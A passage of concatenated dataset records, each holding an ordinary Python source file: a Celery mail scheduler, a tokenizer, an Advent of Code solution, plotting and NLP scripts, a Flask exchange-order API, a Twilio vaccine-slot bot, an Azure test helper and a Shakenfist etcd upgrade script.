86400:\n\n username = 'Admin'\n if row['user_id'] != 10000000000:\n crsr = db.execute(\"SELECT username FROM user WHERE id=?\",\n (row['user_id'],)).fetchone()\n username = list(crsr).pop(0)\n filename = f\"{os.path.join('./instance', 'textmsg')}/{username}_{row['id']}.txt\"\n args = list(row)\n args.pop(1)\n args.insert(5, filename)\n celery_id = send_mail_task.apply_async(args, countdown=countdown).id\n\n # Write celery task id to DB\n if celery_id:\n db.execute(\"UPDATE mail_task\\\n SET celery_id = ? WHERE id = ?;\",\n (celery_id, row['id'])\n )\n db.commit()\n\n row = cursor.fetchone()\n return\n","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":5553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"620200646","text":"from src.configurations import ModelConfigurations \n\nclass PreprocessingTransformers:\n\n def __init__(self, filename: str):\n self.word2index = {}\n self.filename = filename \n self.vocab_size = 0\n\n self._load_file()\n\n def _load_file(self):\n import pickle \n f = open(self.filename, \"rb\")\n data = pickle.load(f)\n for d in data:\n for w, i in d.items():\n if w not in self.word2index:\n self.word2index[w] = int(i)\n self.vocab_size = len(self.word2index)\n \n f.close()\n\n def fit(self):\n pass \n \n def transform(self, text: str, max_length=128):\n import torch \n text = text.strip().split()\n text_ = []\n for r in text:\n r = r.replace(\"\\n\", \" \")\n r = r.replace(\"\\r\", \"\")\n r = r.replace(\".\", \" . 
\")\n r = r.replace(\",\", \" , \")\n text_.append(r)\n\n inputs = []\n for r in text_:\n if r in self.word2index:\n idx = self.word2index[r]\n else:\n idx = self.word2index[\"<unk>\"] # assumed unknown-token name; the original special-token markers were lost in extraction\n inputs.append(idx)\n inputs.insert(0, self.word2index[\"<sos>\"]) # assumed start-of-sequence token name\n\n if max_length > len(inputs):\n for _ in range(max_length-len(inputs)):\n inputs.append(self.word2index[\"<pad>\"]) # assumed padding token name\n else:\n inputs = inputs[:max_length]\n\n inputs = torch.tensor(inputs, dtype=torch.long)\n inputs = inputs.unsqueeze(0)\n\n return inputs \n\nprep = PreprocessingTransformers(\n ModelConfigurations().preprocessing_transformers_path\n)\n","sub_path":"prep_fast/src/ml/transform.py","file_name":"transform.py","file_ext":"py","file_size_in_byte":1424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"329529560","text":"import pandas as pd\n\n'''Part One: read in a file of changing frequencies and\nreport the resulting frequency.'''\n\nwith open('./data/day1input.txt', 'r') as f:\n changes = []\n for line in f:\n line = line.rstrip()\n changes.append(line)\ndata = pd.Series(changes)\nfreq = pd.to_numeric(data)\nprint(freq.sum())\n\n'''Part Two: Determine the first frequency your device reaches twice.'''\ndef freq_repeat(data):\n cumsum = 0\n freq_result = []\n while True:\n for i, val in enumerate(data):\n cumsum += val\n freq_result.append(cumsum)\n if freq_result.count(cumsum) == 2:\n print(cumsum)\n return cumsum\n\n#test = pd.Series([1,-2, 3, 1])\nfreq_repeat(freq)\n","sub_path":"day_1.py","file_name":"day_1.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"73349707","text":"import re\n\nimport nltk\nimport pandas as pd\nfrom nltk.corpus import stopwords\nfrom nltk.stem.snowball import SnowballStemmer\n\nfrom src.utils.file_utils import read_documents, file_len\n\n# import mpld3\n\n# Resource related properties -------------------------------------------------\nRESOURCES_PATH = \"../resources/\"\nDATASET = RESOURCES_PATH + \"train_set.csv\"\nDOC_TITLE_IDX = 2\nDOC_CONTENT_IDX = 3\n\n\nclass Corpus:\n def __init__(self, dataset_file, has_header, stop_words):\n # Fields ----------------------------------------------------\n self.dataset_file = dataset_file\n self.has_header = has_header\n self.stop_words = stop_words\n self.stop_words.update([\"one\", \"two\", \"three\", \"first\", \"also\", \"since\"])\n self.top_categories_with_frequencies = {}\n self.stemmer = SnowballStemmer(\"english\")\n self.kmeans(DOC_TITLE_IDX, DOC_CONTENT_IDX)\n\n def kmeans(self, doc_title_idx, doc_cont_idx):\n # Used for displaying progress\n documents_count = file_len(self.dataset_file) - 1\n current_document = 0\n print(documents_count)\n\n totalvocab_stemmed = []\n totalvocab_tokenized = []\n for row in read_documents(self.dataset_file, self.has_header):\n content = row[doc_cont_idx]\n\n allwords_stemmed = self.tokenize_and_stem(content)\n totalvocab_stemmed.extend(allwords_stemmed)\n\n allwords_tokenized = self.tokenize_only(content)\n totalvocab_tokenized.extend(allwords_tokenized)\n\n vocab_frame = pd.DataFrame({\"words\": totalvocab_tokenized}, index=totalvocab_stemmed)\n print(\"there are \" + str(vocab_frame.shape[0]) + \" items in vocab_frame\")\n\n def tokenize_and_stem(self, text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as its own token\n tokens = [word for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens 
= []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search(\"[a-zA-Z]\", token):\n filtered_tokens.append(token)\n stems = [self.stemmer.stem(t) for t in filtered_tokens]\n return stems\n\n def tokenize_only(self, text):\n # first tokenize by sentence, then by word to ensure that punctuation is caught as it\"s own token\n tokens = [word.lower() for sent in nltk.sent_tokenize(text) for word in nltk.word_tokenize(sent)]\n filtered_tokens = []\n # filter out any tokens not containing letters (e.g., numeric tokens, raw punctuation)\n for token in tokens:\n if re.search(\"[a-zA-Z]\", token):\n filtered_tokens.append(token)\n return filtered_tokens\n\n\nif __name__ == \"__main__\":\n corpus = Corpus(DATASET, True, set(stopwords.words(\"english\")))\n print(\"Done\")\n","sub_path":"src/supervised_learning/old_samples/kmeans.py","file_name":"kmeans.py","file_ext":"py","file_size_in_byte":2916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"206875676","text":"import pylab as plt\nimport numpy as np\nfrom mpl_toolkits.basemap import Basemap, addcyclic, cm, shiftgrid\nimport matplotlib as mpl\nimport netCDF4 as nc\n##\nmpl.rc('figure', figsize=(14, 7), facecolor='white', dpi=120)\nmpl.rc('figure.subplot', wspace=0.5, hspace=0.3)\nmpl.rc('axes', grid=0, titlesize=5)\nmpl.rc('axes.formatter', limits=(-2, 5))\nmpl.rc('lines', linewidth=2, color='r')\nmpl.rc('font', size=11)\n\ndef subset_2d_array (dataset, lat, lat_range, lon, lon_range):\n \"\"\"\n take a 3D data field and do a zonal mean, i.e. across a latitude circle,\n over a given lat range\n i.e. zonal mean of 20S-20N data\n \"\"\"\n import numpy as np\n lat_min = lat_range[0]\n lat_max = lat_range[1]\n lat_max_idx = np.abs(lat - lat_max).argmin()\n lat_min_idx = np.abs(lat - lat_min).argmin()\n lon_min = lon_range[0]\n lon_min_idx = np.abs(lon - lon_min).argmin()\n lon_max = lon_range[1]\n lon_max_idx = np.abs(lon - lon_max).argmin()\n # subset the data into the months of interest and the lat region of interest\n datasubset = dataset[lat_min_idx:lat_max_idx, lon_min_idx:lon_max_idx]\n # take zonal mean\n # print lat_min_idx, lat_max_idx, lon_min_idx, lon_max_idx, np.shape(datasubset)\n return lat[lat_min_idx:lat_max_idx], lon[lon_min_idx:lon_max_idx], datasubset\n\n\ntrend = np.load('o3_emi_trend_1979_2009.npy')\ntrend = trend * 1e9 * 10 # ppbv per decade\nlats = np.load('regrid_lats.npy')\nlons = np.load('regrid_lons.npy')\n\n#setting up min and max lon regions for the USA\n\nus_lon_range = [-125, -60]\nus_lat_range = [15, 55]\n\nna_lon_range=[265,385]\nna_lat_range=[15,75]\n\nlat_range = na_lat_range\nlon_range = na_lon_range\n\nidx_min_lon = np.argmin(np.abs(lons - lon_range[0]))\nidx_max_lon = np.argmin(np.abs(lons - lon_range[1]))\nidx_min_lat = np.argmin(np.abs(lats - lat_range[0]))\nidx_max_lat = np.argmin(np.abs(lats - lat_range[1]))\nidx_lat_range = [idx_min_lat, idx_max_lat]\nidx_lon_range = [idx_min_lon, idx_max_lon]\n\nlat_sub, lon_sub, subset_trend = subset_2d_array(trend, lats, lat_range, lons, lon_range)\n\nplt.figure(figsize=(10,8), dpi=200)\nclevs=np.arange(-0.5, 0.6, 0.1)\nnewmap = Basemap(llcrnrlat=lat_range[0],urcrnrlat=lat_range[1],llcrnrlon=lon_range[0],urcrnrlon=lon_range[1],resolution='c') \n\nnewmap.drawparallels(np.arange(lat_range[0],lat_range[1], 10.), labels=[True,False,False,True])\n#labels = [left,right,top,bottom]\nnewmap.drawmeridians(np.arange(lon_range[0],lon_range[1], 10.), 
labels=[True,False,False,True])\nnewmap.drawcoastlines(linewidth=0.5)\n\nplt.pcolormesh(lon_sub, lat_sub, subset_trend, vmin=clevs[0], vmax = clevs[-1], cmap=plt.cm.RdBu_r)#, extend='both',cmap=plt.cm.RdBu_r)\n\nnewmap.colorbar(label = 'ozone trend / ppbv per decade') \nplt.title(' North Atlantic ozone trend / 1979-2010', fontsize=14)\n\nplt.savefig('o3_xlrua_trends_1979_2010.png')\n","sub_path":"data_analysis/plot_xlrua_o3_trend.py","file_name":"plot_xlrua_o3_trend.py","file_ext":"py","file_size_in_byte":2815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"377136098","text":"import time\nimport calendar\nimport os\nimport requests\nimport json\n\n\ndef get_nus_modules_json():\n last_fetch = os.path.getmtime(\"modules.json\")\n curr_time = calendar.timegm(time.gmtime())\n\n if (curr_time - last_fetch > 432000): # 432000 sec == 5 days\n curr_month = time.gmtime().tm_mon\n curr_year = time.gmtime().tm_year - int(curr_month < 7)\n r = requests.get(\"https://api.nusmods.com/{}-{}/modules.json\".format(curr_year, curr_year+1))\n with open(\"modules.json\", \"w\") as file:\n json.dump(r.json(), file)\n return True\n return False\n\ndef nusmod_list(filename):\n '''\n #Dictionary of nus modules of format\n {:\n {\n {(class type, class code):\n Schedule for that class}\n :\n }\n\n {(class type 2, class code 2):\n Schedule for that class}\n :\n }\n }\n :\n }#End of all classes for the module\n }#End of module list\n '''\n translate = {\n 'Tutorial Type 2': \"TUT2\",\n 'Recitation': 'REC',\n 'Packaged Tutorial': 'PTUT',\n 'Packaged Lecture': 'PLEC',\n 'Seminar-Style Module Class': \"SEM\",\n 'Design Lecture': \"DLEC\",\n 'Laboratory': 'LAB',\n \"Lecture\": \"LEC\",\n \"Tutorial\": \"TUT\",\n 'Sectional Teaching': \"SEC\"}\n lst = [\"ModuleCode\", \"Timetable\"]\n all_modules = {}\n mods = read_json(filename)\n for i in mods:\n tmp = dict(filter(lambda x: x[0] in lst, tuple(i.items())))\n if \"Timetable\" in tmp.keys():\n a = tmp[\"Timetable\"]\n b = {}\n for i in a:\n if i[\"LessonType\"] in translate.keys():\n key = (translate[i[\"LessonType\"]], i[\"ClassNo\"])\n del i[\"LessonType\"]\n del i[\"ClassNo\"]\n del i[\"Venue\"] # delete venue from list\n weird = (\"Orientation Week\", \"Recess Week\", 'r', '')\n if i[\"WeekText\"] == \"Every Week\":\n i[\"WeekText\"] = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n elif i[\"WeekText\"] == \"Even Week\":\n i[\"WeekText\"] = [2, 4, 6, 8, 10, 12]\n elif i[\"WeekText\"] == \"Odd Week\":\n i[\"WeekText\"] = [1, 3, 5, 7, 9, 11, 13]\n elif i[\"WeekText\"] in weird:\n i[\"WeekText\"] = []\n else:\n try:\n i[\"WeekText\"] = list(\n map(lambda x: int(x), (i[\"WeekText\"]).split(\",\")))\n except BaseException:\n i[\"WeekText\"] = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13]\n if key in b:\n b[key].append(dict(i.items()))\n else:\n b[key] = [i]\n else:\n print((tmp[\"ModuleCode\"], i[\"LessonType\"], i))\n\n all_modules[tmp[\"ModuleCode\"]] = b\n return all_modules\n\n# Convert JSON to dictionary\n\n\n#Convert JSON to dictionary\ndef read_json(filename):\n datafile = open(filename, 'r', encoding='utf-8')\n return json.loads(datafile.read())\n","sub_path":"bot/nus_modules.py","file_name":"nus_modules.py","file_ext":"py","file_size_in_byte":3352,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"250773150","text":"from flask import Flask\nfrom flask import request\nimport logging\nfrom common_defs import *\nfrom init_clients import 
exchanges_clients\n\napp = Flask(__name__)\n\n\ndef setup_logger():\n # Prints logger info to terminal\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG) # DEBUG is verbose; raise this level for quieter output\n ch = logging.StreamHandler()\n # create formatter\n formatter = logging.Formatter(\"%(asctime)s - %(name)s - %(levelname)s - %(message)s\")\n # add formatter to ch\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n return logger\n\n\nlogger = setup_logger()\n\n\n@app.route('/')\ndef hello_world():\n return 'Hello World!'\n\n@app.route('/v1/instrument/compositeIndex')\n@app.route('/v1/instrument', methods=[\"GET\"])\ndef instrument():\n eid = request.args.get('eid', '')\n symbol = request.args.get('symbol', '')\n print(\"instrument\")\n res = exchanges_clients[eid].get_instrument(symbol)\n print(res)\n return \"ok\"\n\n\n@app.route('/v1/order/<operation>', methods=[\"POST\", \"GET\", \"DELETE\"])\ndef order(operation):\n\n if request.method == 'POST' and request.is_json:\n req = request.json\n if operation == \"place\":\n if \"clientOrderId\" in req and \"exchangeId\" in req and \"symbol\" in req and \"quantity\" in req:\n\n logger.debug(\"place request: %s\" % request.json)\n client = exchanges_clients[req[\"exchangeId\"]]\n res = client.place_order(req[\"clientOrderId\"], req[\"symbol\"], req[\"quantity\"], req[\"price\"], req[\"type\"])\n logger.debug(res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n elif operation == \"query\":\n if \"clientOrderId\" in req and \"exchangeId\" in req and \"symbol\" in req:\n\n logger.debug(\"query request: %s\" % request.json)\n client = exchanges_clients[req[\"exchangeId\"]]\n res = client.query_order(req[\"clientOrderId\"], req[\"symbol\"])\n logger.debug(\"response: %s\" % res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n elif operation == \"cancel\":\n pass\n\n else:\n return RESPONSE_OF_INVALID_OPERATION_TYPE\n elif request.method == \"GET\":\n args = request.args\n logger.debug(\"GET with args: %s\" % args)\n if operation == \"query\":\n if \"clientOrderId\" in args and \"exchangeId\" in args and \"symbol\" in args:\n\n logger.debug(\"query request: %s\" % args)\n client = exchanges_clients[args[\"exchangeId\"]]\n res = client.query_order(args[\"clientOrderId\"], args[\"symbol\"])\n logger.debug(\"response: %s\" % res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n elif request.method == \"DELETE\":\n args = request.args\n logger.debug(\"DELETE with args: %s\" % args)\n if operation == \"cancel\":\n if \"clientOrderId\" in args and \"exchangeId\" in args and \"symbol\" in args:\n\n logger.debug(\"cancel request: %s\" % args)\n client = exchanges_clients[args[\"exchangeId\"]]\n res = client.cancel_order(args[\"clientOrderId\"], args[\"symbol\"])\n logger.debug(\"response: %s\" % res)\n return RESPONSE_OF_SUCCESSFUL_OPERATION\n else:\n return RESPONSE_OF_BAD_REQUEST\n\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\")\n","sub_path":"data-server/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"370622000","text":"# ------------------------------------\n# Copyright (c) Microsoft Corporation.\n# Licensed under the MIT License.\n# ------------------------------------\nimport time\nimport hashlib\nimport os\n\ntry:\n from unittest.mock import Mock\nexcept 
ImportError: # python < 3.3\n from mock import Mock\n\nfrom azure.core.credentials import AccessToken\nfrom azure.identity import EnvironmentCredential\n\nfrom devtools_testutils import AzureMgmtPreparer\n\nfrom secrets_vault_client import VaultClient\n\n\nclass VaultClientPreparer(AzureMgmtPreparer):\n def __init__(\n self,\n enable_soft_delete=None,\n name_prefix=\"vault\",\n parameter_name=\"vault_client\",\n disable_recording=True,\n playback_fake_resource=None,\n client_kwargs=None,\n random_name_enabled=True\n ):\n super(VaultClientPreparer, self).__init__(\n name_prefix,\n 24,\n disable_recording=disable_recording,\n playback_fake_resource=playback_fake_resource,\n client_kwargs=client_kwargs,\n random_name_enabled=random_name_enabled\n )\n self.parameter_name = parameter_name\n\n def create_resource(self, name, **kwargs):\n client = self.create_vault_client(kwargs.get(\"vault_uri\"))\n return {self.parameter_name: client}\n\n def create_vault_client(self, vault_uri):\n if self.is_live:\n credential = EnvironmentCredential()\n else:\n credential = Mock(get_token=lambda _: AccessToken(\"fake-token\", 0))\n return VaultClient(vault_uri, credential, is_live=self.is_live, **self.client_kwargs)\n","sub_path":"sdk/keyvault/azure-keyvault-secrets/tests/secrets_preparer.py","file_name":"secrets_preparer.py","file_ext":"py","file_size_in_byte":1619,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"428830308","text":"from flask import Flask, request\nimport requests\nimport geopy\nimport re\n# import geopy.distance\nfrom geopy.geocoders import Nominatim\nimport json\nfrom datetime import datetime\nimport constants\nfrom twilio.twiml.messaging_response import MessagingResponse\n\n# Create Flask app instance\napp = Flask(__name__)\n\n# Create geolocator object as an instance of geopy's Nominatim class\ngeolocator = Nominatim(user_agent=\"covid-bot\", timeout=5)\n\n# Base API URL\nbase_url = 'https://cdn-api.co-vin.in/api'\n\n\n# Create the API route\n@app.route('/bot', methods=['POST'])\ndef bot():\n # import ipdb;ipdb.set_trace()\n # Get the incoming message request data\n incoming_values = request.values\n print(\"Incoming Values:\\n\", incoming_values)\n\n # Get Geolocation sent by user\n latitude = incoming_values.get('Latitude', '')\n longitude = incoming_values.get('Longitude', '')\n\n # geopy geolocator API expects coordinates as a single comma separated string of latitude and longitude\n geo_coordinates_string = \", \".join((latitude, longitude))\n\n # Get the incoming message from incoming_values\n incoming_msg = incoming_values.get('Body', '').lower()\n\n\n if incoming_msg in constants.greeting_tokens:\n # return greeting message\n return as_twilio_response(constants.welcome_message)\n\n if 'help' in incoming_msg:\n # return help message\n return as_twilio_response(constants.help_message)\n\n if latitude:\n # Get the address dict from the geolocation data sent\n geo_location_dict = get_reverse_geocode(geo_coordinates_string)\n # pincode = geo_location_dict.get('postcode', '')\n # print('Pincode:', pincode)\n\n date_now = datetime.today().strftime('%d-%m-%Y')\n print(\"Today's Date:\", date_now)\n\n \n # appointment_response = get_appointment_response_by_pincode(appointment_api)\n \n location_response = get_location_message(geo_location_dict, date_now)\n return as_twilio_response(location_response)\n\n m = re.match(r\"^\\d+$\", incoming_msg)\n if m:\n date_now = datetime.today().strftime('%d-%m-%Y')\n return 
as_twilio_response(get_by_pincode(m.string, date_now))\n \n\n return as_twilio_response('Could not understand your message. Please type \"help\".')\n\n\n# helper functions\ndef as_twilio_response(message: str) -> str:\n resp = MessagingResponse()\n msg = resp.message()\n msg.body(message)\n return str(resp)\n\ndef get_response(url):\n response = requests.get(url, headers={'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:88.0) Gecko/20100101 Firefox/88.0'})\n return response.json()\n\n\n# Get the address dict\ndef get_reverse_geocode(coordinates):\n location = geolocator.reverse(coordinates, exactly_one=True)\n address_dict = location.raw['address']\n print(\"Address Dict:\", address_dict)\n return address_dict\n\n\n# def get_appointment_response_by_pincode(appointment_api):\n# appointment_api = base_url + '/v2/appointment/sessions/public/findByPin?pincode={pincode}&date={date_now}'\n\n# appointment_data = get_response(appointment_api)\n# return appointment_data\n\n\ndef get_by_pincode(pincode, date_now):\n appointment_api_by_pin = base_url + '/v2/appointment/sessions/public/findByPin?pincode={pincode}&date={date_now}'.format(pincode=pincode, date_now=date_now)\n appointment_data = get_response(appointment_api_by_pin)\n\n appointment_response = f'''\n '''\n sessions = appointment_data.get(\"sessions\", [])\n if sessions:\n for idx, each in enumerate(sessions):\n # Print the name, address, district\n serial_number = idx + 1\n name = each.get(\"name\", \"\")\n address = each.get(\"address\", \"\")\n district = each.get(\"district_name\", \"\")\n from_time = each.get(\"from\", \"\")\n to_time = each.get(\"to\", \"\")\n fee_type = each.get(\"fee_type\", \"\")\n fee = each.get(\"fee\", 0)\n available_capacity = each.get(\"available_capacity\", 0)\n min_age_limit = each.get(\"min_age_limit\", 18)\n vaccine = each.get(\"vaccine\", \"\")\n\n each_response = f'''\n {serial_number}. 
{name}\n {address}, {district}\n Vaccine: {vaccine}, {fee_type}\n Available: {available_capacity} \n '''\n appointment_response += each_response\n else:\n appointment_response = \"0\"\n \n location_message = f'''\nYour location pincode is {pincode}.\n\nAvailable vaccine slots today: {appointment_response}\n\nVisit www.cowin.gov.in to book your vaccination\n'''\n return location_message\n\ndef get_location_message(geo_location_dict, date_now):\n # TODO: Add complete address to show in Location response\n # or add entire address, but remove 'country_code': 'in'\n # village = geo_location_dict.get('village', '')\n # city = geo_location_dict.get('city', '')\n # county = geo_location_dict.get('county', '')\n\n pincode = geo_location_dict.get('postcode', '')\n \n # states_api = base_url + '/v2/admin/location/states'\n # states_data = get_response(states_api)\n # print(states_data)\n\n return get_by_pincode(pincode, date_now)\n\n\n\nif __name__ == '__main__':\n app.run()\n\n# Get states and districts\n# base_api = 'https://cdn-api.co-vin/api'\n# # API to get all the states in India.\n# states_api = base_api + '/v2/admin/location/states'\n# states_data = get_response(states_api)\n# print(states_data)\n\n# API to get districts for a given state\n# district_api = base_api + '/v2/admin/location/districts/{state_id}'\n# district_data_per_state = get_response(district_api)\n\n# Checkout https://apisetu.gov.in/public/marketplace/api/cowin#/ for the CoWin Public API","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5715,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"41556841","text":"# Copyright 2020 Michael Still\n\nimport ipaddress\nimport json\nimport time\n\nfrom shakenfist import baseobject\nfrom shakenfist.baseobject import DatabaseBackedObject as dbo\nfrom shakenfist import etcd\nfrom shakenfist import instance\nfrom shakenfist import networkinterface\nfrom shakenfist.node import Node\nfrom shakenfist.util import process as util_process\n\n# Very simple data upgrader\n\n\ndef clean_events_mesh_operations(etcd_client):\n # TODO(andy): This can be removed when older releases do not exist\n\n # We probably need to cleanup excess network mesh events. 
We also need to\n # try and fetch small batches because of limits in the amount of data etcd3\n # can return at one time.\n\n # Save time and use the already available etcdctl client.\n net_keys, stderr = util_process.execute(None,\n 'etcdctl get --prefix /sf/event/network/ | grep sf/event',\n check_exit_code=[0, 1])\n if stderr:\n print('ERROR: Unable to retrieve network keys:%s' % stderr)\n return\n\n # Split network events into networks\n network_events = {}\n for key in net_keys.split('\\n'):\n if not key:\n continue\n _blank, _sf, _event, _network, uuid, _time = key.split('/')\n network_events.setdefault(uuid, []).append(key)\n\n # Delete all but last 50 events\n count = 0\n for keys in network_events.values():\n for k in keys[:-50]:\n print('--> Removing verbose network event %s' % k)\n etcd_client.delete(k)\n count += 1\n print(' - Cleaned up %d old network mesh events' % count)\n\n\ndef main():\n etcd_client = etcd.WrappedEtcdClient()\n\n releases = {}\n old_style_nodes = []\n\n for data, _ in etcd_client.get_prefix('/sf/node/'):\n n = json.loads(data.decode('utf-8'))\n\n observed = etcd_client.get(\n '/sf/attribute/node/%s/observed' % n['fqdn'])\n if observed:\n # New style node\n observed = json.loads(observed[0].decode('utf-8'))\n release = observed['release']\n else:\n # Old style node\n release = n.get('version', 'unknown')\n old_style_nodes.append(n['fqdn'])\n\n releases.setdefault(release, 0)\n releases[release] += 1\n\n print('Deployed releases:')\n for release in sorted(releases):\n print(' - %s: %s' % (release, releases[release]))\n print()\n\n min_release = None\n if not releases:\n min_release = '0.2'\n elif 'unknown' in releases:\n min_release = '0.2'\n else:\n min_release = sorted(releases)[0]\n print('Minimum release is %s' % min_release)\n\n elems = min_release.split('.')\n major = int(elems[0])\n minor = int(elems[1])\n\n if major == 0:\n if minor <= 4:\n # Upgrade networkinterfaces to the new attribute style\n for data, metadata in etcd_client.get_prefix('/sf/networkinterface/'):\n ni = json.loads(data.decode('utf-8'))\n if int(ni.get('version', 0)) < 2:\n etcd_client.put(\n '/sf/attribute/image/%s/floating' % ni['uuid'],\n json.dumps({'floating_address': ni.get('floating')},\n indent=4, sort_keys=True))\n if 'floating' in ni:\n del ni['floating']\n\n etcd_client.put(\n '/sf/attribute/image/%s/state' % ni['uuid'],\n json.dumps({\n 'state': ni['state'],\n 'state_updated': ni['state_updated']\n }, indent=4, sort_keys=True))\n del ni['state']\n del ni['state_updated']\n\n ni['version'] = 2\n etcd_client.put(\n metadata['key'], json.dumps(ni, indent=4, sort_keys=True))\n print('--> Upgraded networkinterface %s to version 2'\n % ni['uuid'])\n\n # Upgrade ipmanagers to v2, deleting strays while we're at it\n for data, metadata in etcd_client.get_prefix('/sf/ipmanager/'):\n network_uuid = metadata['key'].decode('utf-8').split('/')[-1]\n\n if not etcd_client.get('/sf/network/%s' % network_uuid):\n print('--> Deleted stray ipmanager %s' % network_uuid)\n etcd_client.delete(metadata['key'])\n continue\n\n ipm = json.loads(data.decode('utf-8'))\n if 'ipmanager.v1' in ipm:\n ipm['ipmanager.v2'] = {\n 'ipblock': ipm['ipmanager.v1']['ipblock'],\n 'in_use': {},\n 'uuid': network_uuid\n }\n for elem in ipm['ipmanager.v1']['in_use']:\n ipm['ipmanager.v2']['in_use'][elem] = ('unknown', None)\n\n del ipm['ipmanager.v1']\n\n if ipm['ipmanager.v2']['uuid'] == 'floating':\n ipblock_obj = ipaddress.ip_network(ipm['ipmanager.v2']['ipblock'],\n strict=False)\n for addr in 
[str(ipblock_obj[0]),\n str(ipblock_obj[1]),\n str(ipblock_obj.broadcast_address),\n str(ipblock_obj.network_address)]:\n ipm['ipmanager.v2']['in_use'][addr] = (\n 'ipmanager', network_uuid)\n\n etcd_client.put(\n metadata['key'], json.dumps(ipm, indent=4, sort_keys=True))\n print('--> Upgraded ipmanager %s to version 2' % network_uuid)\n\n # Bump instance version to support UEFI\n for data, metadata in etcd_client.get_prefix('/sf/instance/'):\n i = json.loads(data.decode('utf-8'))\n if i['version'] == 2:\n i['uefi'] = False\n i['version'] = 3\n etcd_client.put(\n metadata['key'], json.dumps(i, indent=4, sort_keys=True))\n\n clean_events_mesh_operations(etcd_client)\n\n if minor <= 3:\n # Upgrade instances to the new attribute style (this needs to\n # happen before we upgrade networks below).\n for data, _ in etcd_client.get_prefix('/sf/instance/'):\n inst = json.loads(data.decode('utf-8'))\n if int(inst.get('version', 0)) < 2:\n data = {}\n for attr in ['node', 'placement_attempts']:\n if inst.get(attr):\n data[attr] = inst[attr]\n del inst[attr]\n etcd_client.put(\n '/sf/attribute/instance/%s/placement' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n if 'enforced_deletes' in inst:\n data = {'count': inst.get('enforced_deletes', 0)}\n del inst['enforced_deletes']\n etcd_client.put(\n '/sf/attribute/instance/%s/enforce_deletes' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n if 'block_devices' in inst:\n data = {'block_devices': inst.get(\n 'block_devices', 0)}\n del inst['block_devices']\n etcd_client.put(\n '/sf/attribute/instance/%s/block_devices' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n state = baseobject.State(inst.get('state'),\n inst.get('state_updated'))\n for attr in ['state', 'state_updated']:\n inst.pop(attr, None)\n etcd_client.put(\n '/sf/attribute/instance/%s/state' % inst['uuid'],\n json.dumps(state.obj_dict(), indent=4, sort_keys=True))\n\n err_msg = inst.get('error_message')\n if err_msg:\n inst.pop('error_message', None)\n etcd_client.put(\n '/sf/attribute/instance/%s/error' % inst['uuid'],\n json.dumps({'message': err_msg},\n indent=4, sort_keys=True))\n\n data = {}\n for attr in ['power_state', 'power_state_previous',\n 'power_state_updated']:\n if inst.get(attr):\n data[attr] = inst[attr]\n del inst[attr]\n etcd_client.put(\n '/sf/attribute/instance/%s/power_state' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n data = {}\n for attr in ['console_port', 'vdi_port']:\n if inst.get(attr):\n data[attr] = inst[attr]\n del inst[attr]\n etcd_client.put(\n '/sf/attribute/instance/%s/ports' % inst['uuid'],\n json.dumps(data, indent=4, sort_keys=True))\n\n # These fields were set in code to v0.3.3, but never used\n for key in ['node_history', 'requested_placement']:\n if key in inst:\n del inst[key]\n\n inst['version'] = 2\n etcd_client.put(\n '/sf/instance/%s' % inst['uuid'],\n json.dumps(inst, indent=4, sort_keys=True))\n print('--> Upgraded instance %s to version 2'\n % inst['uuid'])\n\n # Upgrade images to the new attribute style\n for data, metadata in etcd_client.get_prefix('/sf/image/'):\n image_node = '/'.join(\n metadata['key'].decode('utf-8').split('/')[-2:])\n image = json.loads(data.decode('utf-8'))\n if int(image.get('version', 0)) < 2:\n data = {}\n RENAMES = {\n 'fetched': 'fetched_at',\n 'file_version': 'sequence'\n }\n for attr in ['size', 'modified', 'fetched', 'file_version']:\n if image.get(attr):\n data[RENAMES.get(attr, attr)] = image[attr]\n del image[attr]\n etcd_client.put(\n 
